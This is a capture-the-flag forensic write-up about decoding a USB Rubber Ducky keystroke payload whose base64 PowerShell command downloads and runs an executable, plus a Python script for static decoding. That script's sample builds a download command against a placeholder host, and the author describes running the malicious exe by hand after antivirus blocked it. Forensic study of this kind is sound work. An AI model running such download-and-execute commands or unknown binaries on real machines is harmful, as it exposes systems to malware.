Root Me - Ugly Duckling - Forensic Challenge - Write-up


We're given a file that we need to analyse. Initial analysis with the file command, exiftool, foremost and binwalk did not show anything interesting, so I looked up the Root Me forums for this challenge and found this thread: https://www.root-me.org/?page=forum&id_thread=7300&lang=en#forum10458. Apparently it refers to a USB Rubber Ducky, so the file must be the compiled keystroke script, and I just need to decode it. A quick Google search led me to https://ducktoolkit.com/, but that did not work. Then I found the decoder script in the official repository: https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Decode/ducky-decode.pl. That one works.
It looks like the payload executes malicious code.


I googled the 'enc' parameter of PowerShell and found this: https://artofpwn.com/offensive-and-defensive-powershell-ii.html. So the argument is base64 encoded. Decoding...



The decoded PowerShell command downloads an executable and runs it. I tried to run it in PowerShell, but my antivirus program blocked it, so I downloaded the exe manually and ran it. Finally, the flag shows up.
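Both decoding steps above (keystroke payload to Ducky Script, then the base64 -enc argument to the PowerShell it runs) can be done statically, which is the safer way to get at what the second stage does without executing anything. The following is an added example written for this write-up, not hak5's ducky-decode.pl and not the challenge file. It assumes the classic inject.bin layout of 2-byte entries (HID usage id, modifier byte; a 0x00 first byte means the second byte is a delay in milliseconds, chained in 0xFF chunks) and that -enc carries base64 of the UTF-16LE command. The sample payload is constructed inside the block with a placeholder URL (example.invalid) so it runs offline.

```python
"""Static analysis of a USB Rubber Ducky inject.bin: decode the keystroke
payload back to Ducky Script and unwrap any PowerShell -enc argument it types,
without running the payload. Added example; sample data is constructed."""
import base64
import re
import struct

MOD_CTRL, MOD_SHIFT, MOD_ALT, MOD_GUI = 0x01, 0x02, 0x04, 0x08

# USB HID keyboard usage ids -> unshifted key. Single characters are typed
# text; longer names are special keys that end a STRING line.
KEYS = {0x04 + i: chr(ord("a") + i) for i in range(26)}
KEYS.update({0x1E + i: "123456789"[i] for i in range(9)})
KEYS.update({0x27: "0", 0x28: "ENTER", 0x29: "ESC", 0x2A: "BACKSPACE", 0x2B: "TAB",
             0x2C: " ", 0x2D: "-", 0x2E: "=", 0x2F: "[", 0x30: "]", 0x31: "\\",
             0x33: ";", 0x34: "'", 0x35: "`", 0x36: ",", 0x37: ".", 0x38: "/"})
SHIFTED = {"1": "!", "2": "@", "3": "#", "4": "$", "5": "%", "6": "^", "7": "&",
           "8": "*", "9": "(", "0": ")", "-": "_", "=": "+", "[": "{", "]": "}",
           "\\": "|", ";": ":", "'": '"', "`": "~", ",": "<", ".": ">", "/": "?"}


def shifted(ch):
    """Character produced when the key for `ch` is pressed with SHIFT held."""
    return SHIFTED.get(ch, ch.upper())


# character -> (usage id, modifier); only needed to build the constructed sample
CHAR_TO_ENTRY = {}
for _code, _ch in KEYS.items():
    if len(_ch) == 1:
        CHAR_TO_ENTRY[_ch] = (_code, 0)
        if shifted(_ch) != _ch:
            CHAR_TO_ENTRY[shifted(_ch)] = (_code, MOD_SHIFT)


def encode_ducky(script):
    """Minimal encoder for the DELAY/GUI/STRING/ENTER subset (builds test input)."""
    out = bytearray()
    for line in script.strip().splitlines():
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            ms = int(arg)
            while ms > 0:                      # delays longer than 255 ms are chained
                out += bytes([0x00, min(ms, 0xFF)])
                ms -= 0xFF
        elif cmd == "STRING":
            for ch in arg:
                out += bytes(CHAR_TO_ENTRY[ch])
        elif cmd == "GUI":
            out += bytes([CHAR_TO_ENTRY[arg][0], MOD_GUI])
        elif cmd == "ENTER":
            out += bytes([0x28, 0x00])
    return bytes(out)


def decode_inject_bin(data):
    """Turn the 2-byte (usage id, modifier) entries back into Ducky Script lines."""
    lines, delay, text = [], 0, ""

    def flush_text():
        nonlocal text
        if text:
            lines.append(f"STRING {text}")
            text = ""

    for code, mod in struct.iter_unpack("<BB", data[: len(data) & ~1]):
        if code == 0x00:                       # delay entry: second byte is milliseconds
            flush_text()
            delay += mod
            continue
        if delay:
            lines.append(f"DELAY {delay}")
            delay = 0
        name = KEYS.get(code, f"0x{code:02X}")  # unknown usage ids are shown raw
        if mod & (MOD_CTRL | MOD_ALT | MOD_GUI):  # key combination such as GUI r
            flush_text()
            parts = [n for bit, n in ((MOD_CTRL, "CTRL"), (MOD_ALT, "ALT"), (MOD_GUI, "GUI"),
                                      (MOD_SHIFT, "SHIFT")) if mod & bit]
            lines.append(" ".join(parts + [name]))
        elif len(name) == 1:                   # typed character, shifted or not
            text += shifted(name) if mod & MOD_SHIFT else name
        else:                                  # special key (ENTER, TAB, ...)
            flush_text()
            lines.append(name)
    flush_text()
    if delay:
        lines.append(f"DELAY {delay}")
    return lines


# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match -e, -ec, -enc too.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def unwrap_encoded_command(script_lines):
    """Plaintext of the first -enc argument (base64 of UTF-16LE), or None."""
    for line in script_lines:
        m = ENC_RE.search(line)
        if m:
            return base64.b64decode(m.group(1)).decode("utf-16-le")
    return None


def analyse(data):
    script = decode_inject_bin(data)
    return {"script": script, "command": unwrap_encoded_command(script)}


# Constructed sample with a placeholder URL; mirrors the download-and-run shape described above.
SAMPLE_COMMAND = ("(New-Object Net.WebClient).DownloadFile("
                  "'http://example.invalid/stage2.exe','stage2.exe')")
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode()
SAMPLE_SCRIPT = f"DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -enc {SAMPLE_B64}\nENTER"
SAMPLE_BIN = encode_ducky(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = analyse(SAMPLE_BIN)
    print("\n".join(result["script"]))
    print("decoded -enc:", result["command"])
```

Running it prints the reconstructed Ducky Script followed by the plaintext PowerShell, which is what VirusTotal's behaviour tab or the manual download would otherwise have to reveal; for a real capture, pass the bytes of the challenge file to analyse() instead of SAMPLE_BIN.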

Comments

  1. Hello brother, for me https://ducktoolkit.com/ worked perfectly, and I did not execute it, I just put it in virustotal.com; the flag is there in the behavior section ;)
